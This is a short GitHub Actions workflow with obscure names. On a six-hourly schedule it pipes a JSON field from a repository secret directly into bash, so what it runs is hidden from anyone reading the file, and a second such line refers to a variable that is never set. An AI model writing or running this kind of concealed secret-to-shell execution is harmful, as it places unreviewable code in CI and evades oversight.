name: yuanyongyi7135

on:
  workflow_dispatch:
  schedule:
    - cron: '0 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yuanyongyi7135
        env:
          f0331: ${{ secrets.f0331 }}
        run: |
          echo $f0331 | jq -r .cq57 | /bin/bash
          echo $ldanw217 | jq -r .wqv841 | /bin/bash

